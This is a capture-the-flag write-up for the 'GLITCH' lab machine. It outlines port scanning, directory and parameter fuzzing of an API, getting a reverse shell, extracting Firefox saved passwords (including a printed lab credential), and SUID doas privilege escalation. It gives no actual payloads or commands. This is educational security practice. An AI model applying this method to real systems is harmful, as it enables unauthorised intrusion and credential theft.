GLITCH
Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?
Last updated
Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?
Last updated
First scan the machine for open ports. Scan the machine for open ports using RustScan. It's faster than Nmap, so I prefer using it exclusively for now.
Looks like only the HTTP port is open. Let's open it in the browser and see what's there. Nothing interesting, so I run feroxbuster to fuzz files and directories. I also run a nikto command in background, because it will take a while.
Discovered an interesting path: /api/acces.When I access it I found a token with base64 encoded value.
Replace the token with the discovered value. Let's proceed to fuzz once more with the cookie configured accordingly.
After conducting another round of fuzzing for files and directories, I examine the JavaScript code located at /js/script.js.
Get another path interesting /api/items. After a while I get something in response by changing the request method.
At this stage, I encountered a temporary impasse. After a while I proceeded to fuzz for parameters and responses with a 500 status code.
Now all I need to do is to get a reverse shell.
We get a shell as user, and in home directory we found user.txt flag. In same directory I found .firefox directory and again I was stuck for a while.
Transfer directory in my machine and analyze it.
This take me a lot, but finally I get the answer by open firefox and search for saved passwords.
v0id:love_the_void
During the penetration test, specific steps are followed for privilege escalation. After some time, I discovered that the "doas" file possesses the SUID bit set. Change the user to v0id and run doas.
